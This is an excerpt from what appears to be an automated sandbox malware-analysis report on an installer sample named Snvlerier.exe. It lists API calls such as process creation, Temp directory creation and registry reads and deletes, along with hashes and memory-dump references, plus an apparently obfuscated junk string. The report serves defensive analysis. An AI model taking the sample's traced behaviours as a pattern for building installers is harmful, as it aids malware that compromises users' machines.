                                              • Instruction Fuzzy Hash: D501B1B110420AAFDF205F12DC80E5B3766EBC0355F108037FB00762D1C7799D519B6A
                                              APIs
                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00421CE8,Error launching installer), ref: 004054E2
                                              • CloseHandle.KERNEL32(?), ref: 004054EF
                                              Strings
                                              • Error launching installer, xrefs: 004054D0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: 241bad728a32e0c3e895e4889696dbc95506659d4d8b5e1513a77db0606b6cd0
                                              • Instruction ID: bbe7ebe02affcfda66e1acc14ca803203466629919307a0ed04263dcae4d4c15
                                              • Opcode Fuzzy Hash: 241bad728a32e0c3e895e4889696dbc95506659d4d8b5e1513a77db0606b6cd0
                                              • Instruction Fuzzy Hash: C0E0E674A44209ABDB10DFA5DD4596B777CF710305B408531BD10E2160D774D410DB79
                                              APIs
                                                • Part of subcall function 00405F58: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Snvlerier.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403225,C:\Users\user\AppData\Local\Temp\,74DF3410,004033FA), ref: 00405FB0
                                                • Part of subcall function 00405F58: CharNextA.USER32(?,?,?,00000000), ref: 00405FBD
                                                • Part of subcall function 00405F58: CharNextA.USER32(?,"C:\Users\user\Desktop\Snvlerier.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403225,C:\Users\user\AppData\Local\Temp\,74DF3410,004033FA), ref: 00405FC2
                                                • Part of subcall function 00405F58: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403225,C:\Users\user\AppData\Local\Temp\,74DF3410,004033FA), ref: 00405FD2
                                              • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3410,004033FA), ref: 0040323A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: Char$Next$CreateDirectoryPrev
                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 4115351271-517883005
                                              • Opcode ID: ec8c9c97bff1120b2e65eaab48ba23d408da3423c3445e11bcdfbce4059306dd
                                              • Instruction ID: e26040ced4c102c207e23111f0bc7ac77c172ae5f25e28878e14410923cff34e
                                              • Opcode Fuzzy Hash: ec8c9c97bff1120b2e65eaab48ba23d408da3423c3445e11bcdfbce4059306dd
                                              • Instruction Fuzzy Hash: 45D0921264AE30A2D59136267C0AFCF0A0C9F5636AB11807BF908B50C24A6C6A5259FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 42d1858e2251f64f9c770562e35e0de35468c2066f60ca627427fbf4f76bbab3
                                              • Instruction ID: 72a2d1f91704cbb14bf6e8385ff24788766dbba47b4d24995c5b87aaffd0b603
                                              • Opcode Fuzzy Hash: 42d1858e2251f64f9c770562e35e0de35468c2066f60ca627427fbf4f76bbab3
                                              • Instruction Fuzzy Hash: 05A14371E00228CBDF28CFA8C8447ADBBB1FB45305F15816ED856BB281C7786A96DF44
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ae06bee8f5987398dea42361559645a41b99f7ccd135df7179a9695e45330ccf
                                              • Instruction ID: a63188648829d6e2bb414575b02f4c2bfce92084ad28082cbb3e835430f71c2d
                                              • Opcode Fuzzy Hash: ae06bee8f5987398dea42361559645a41b99f7ccd135df7179a9695e45330ccf
                                              • Instruction Fuzzy Hash: 98912270E00228CBDF28CFA8C8547ADBBB1FB45305F15816ED852BB291C7786A96DF44
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d5504bc004c8071c20d1265f3ef6576704e37df0093059b260449231cfd8d0a
                                              • Instruction ID: 920099d32c65bd5cd3a3eca51b7357b249a437bdbcf8d2ed492f7236ac18ab9b
                                              • Opcode Fuzzy Hash: 5d5504bc004c8071c20d1265f3ef6576704e37df0093059b260449231cfd8d0a
                                              • Instruction Fuzzy Hash: 4C814671D00228CFDF24CFA8C8447ADBBB1FB45305F25816AD856BB291C7389A96DF44
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 586c71402bf298e80f6b66c2df328de67724a66afdd0a99577f3ef00130087e0
                                              • Instruction ID: 9902db06b2bd41d14fe0cf722ff541d27ea46ad9b2243119b703328d115fb70a
                                              • Opcode Fuzzy Hash: 586c71402bf298e80f6b66c2df328de67724a66afdd0a99577f3ef00130087e0
                                              • Instruction Fuzzy Hash: B4711371E00228DFDF24CFA8C8447ADBBB1FB48305F15806AD856BB291D7789A96DF44
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1132d1035c1679612cd1e59a34fdb3caa502ae9401de0c63145cb733084888ea
                                              • Instruction ID: 675ec75cf4d6229ebe8c346ae123bf602053d0f276b36a34e6f466b107fbcc7a
                                              • Opcode Fuzzy Hash: 1132d1035c1679612cd1e59a34fdb3caa502ae9401de0c63145cb733084888ea
                                              • Instruction Fuzzy Hash: CF712571E00228CBDF28CFA8C844BADBBB1FB44305F15806AD856BB291C7785A96DF44
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4c695dd4e080805fa67a8354daecee7844b668df082e4c0b6e4322b37054bf89
                                              • Instruction ID: bc7c0cbb05b66f64c96d0ce4140d90995bbeb9b69bd68a0c5a3aaa3ee046ff49
                                              • Opcode Fuzzy Hash: 4c695dd4e080805fa67a8354daecee7844b668df082e4c0b6e4322b37054bf89
                                              • Instruction Fuzzy Hash: 60711771E04228DBDF24CFA8C844BADBBB1FB44305F15806ED856BB291C7786A56DF44
                                              APIs
                                                • Part of subcall function 00404FFA: lstrlenA.KERNEL32(0041FCC0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C5B,00000000,?), ref: 00405033
                                                • Part of subcall function 00404FFA: lstrlenA.KERNEL32(00402C5B,0041FCC0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C5B,00000000), ref: 00405043
                                                • Part of subcall function 00404FFA: lstrcatA.KERNEL32(0041FCC0,00402C5B,00402C5B,0041FCC0,00000000,00000000,00000000), ref: 00405056
                                                • Part of subcall function 00404FFA: SetWindowTextA.USER32(0041FCC0,0041FCC0), ref: 00405068
                                                • Part of subcall function 00404FFA: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040508E
                                                • Part of subcall function 00404FFA: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050A8
                                                • Part of subcall function 00404FFA: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050B6
                                                • Part of subcall function 004054BD: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00421CE8,Error launching installer), ref: 004054E2
                                                • Part of subcall function 004054BD: CloseHandle.KERNEL32(?), ref: 004054EF
                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                              • String ID:
                                              • API String ID: 3521207402-0
                                              • Opcode ID: 9d37a5a52232d6e021aa8203c1ee73d430995fb7e190c6c134f873b4be8acbfc
                                              • Instruction ID: 0b20019ac51169acdc50ecc9d523a2c19eb009975c49a2b629b096fd0fc638d7
                                              • Opcode Fuzzy Hash: 9d37a5a52232d6e021aa8203c1ee73d430995fb7e190c6c134f873b4be8acbfc
                                              • Instruction Fuzzy Hash: 23014031D04119EBDF21AFA1DD859AE7B71AB00345F10857BF601B51E0C77D8A81DFAA
                                              APIs
                                              • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone,0040B088,004030D5,privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone,00004000,?,00000000,?,00402F5F,00000004,00000000,00000000), ref: 004031E7
                                              Strings
                                              • privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone, xrefs: 004031D3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: privities frikadellen filmskaberen karleagtig grossness strmliningernes apanage diskoskastene kursivenswhistlers geddefarses morel panters lamaism,catalyze driftsbudgetter lucrific galilere calorifical.baobabtrs ekstrabevilling bestikkelserne cruder dictyone
                                              • API String ID: 2738559852-4172010041
                                              • Opcode ID: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                              • Instruction ID: b7dd319eb3762fbeae21b62c9cb99394d5885c2af7ce876f9ed0240699706b57
                                              • Opcode Fuzzy Hash: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                              • Instruction Fuzzy Hash: 51E08C32114118BFCF205E55DC01EE73F5CEB083A2F00C032B958E9190D234EA51ABE8
                                              APIs
                                                • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B39
                                              • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F6
                                              • RegCloseKey.ADVAPI32(?,?,?,0040A3B0,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040248E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: d45d4edbc2280f65bdd1cf2c0291a2f4cd5abf11a885828d501a33ebfe1871ea
                                              • Instruction ID: 327b868ce0ac71ac6a361203111fca08acba39f26d494bc924d202f9e90198fc
                                              • Opcode Fuzzy Hash: d45d4edbc2280f65bdd1cf2c0291a2f4cd5abf11a885828d501a33ebfe1871ea
                                              • Instruction Fuzzy Hash: 3D11A331D05205EFDB15CF64DA889AFBBB49F04344F20843FE446B72C0D2B85A41DB2A
                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 97c212e513a3ea3c506184a8e5fa5dd006333a5afeebed91366c6bbf9ab88be1
                                              • Instruction ID: 882308b91c6c1aedbed37d9c4ac9a4dd8aae758b9d4f80e2d04c65c0a2429680
                                              • Opcode Fuzzy Hash: 97c212e513a3ea3c506184a8e5fa5dd006333a5afeebed91366c6bbf9ab88be1
                                              • Instruction Fuzzy Hash: FD01D131B24210ABE7294B389D08B6A36A9E710715F10863AF851F66F1D678DC028B49
                                              APIs
                                                • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B39
                                              • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DD
                                              • RegCloseKey.ADVAPI32(00000000), ref: 004022E6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: CloseDeleteOpenValue
                                              • String ID:
                                              • API String ID: 849931509-0
                                              • Opcode ID: cbcd15361ec8d1693ff8a69ac8a4cc64642f0db609c702a94b73620666020fdb
                                              • Instruction ID: 14edf71979e4259591d20ceb715b46b7b25eba26358946346a650a594e6b1e75
                                              • Opcode Fuzzy Hash: cbcd15361ec8d1693ff8a69ac8a4cc64642f0db609c702a94b73620666020fdb
                                              • Instruction Fuzzy Hash: FFF0AF32A00110ABDB10BBF49F8EEAE62689B40318F10053BF501B71C1D9FD5E019A6E
                                              APIs
                                              • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A04
                                              • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A17
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStringslstrcmp
                                              • String ID:
                                              • API String ID: 1938659011-0
                                              • Opcode ID: 529045867a41d9efb9dd5b767f2bd254b12e588f1eb329e59c66d7970cc9f5ea
                                              • Instruction ID: 7c23bae3cb0848640c940f57aa5b2218ed6c59c8ab5a1956cc4471e431d11216
                                              • Opcode Fuzzy Hash: 529045867a41d9efb9dd5b767f2bd254b12e588f1eb329e59c66d7970cc9f5ea
                                              • Instruction Fuzzy Hash: FEF08C32F06241EBCB21CF6A9D48AABBFA8DF51350B10403BE549E6290D2788541DE59
                                              APIs
                                              • GetFileAttributesA.KERNELBASE(00000003,00402CC6,C:\Users\user\Desktop\Snvlerier.exe,80000000,00000003), ref: 0040599F
                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
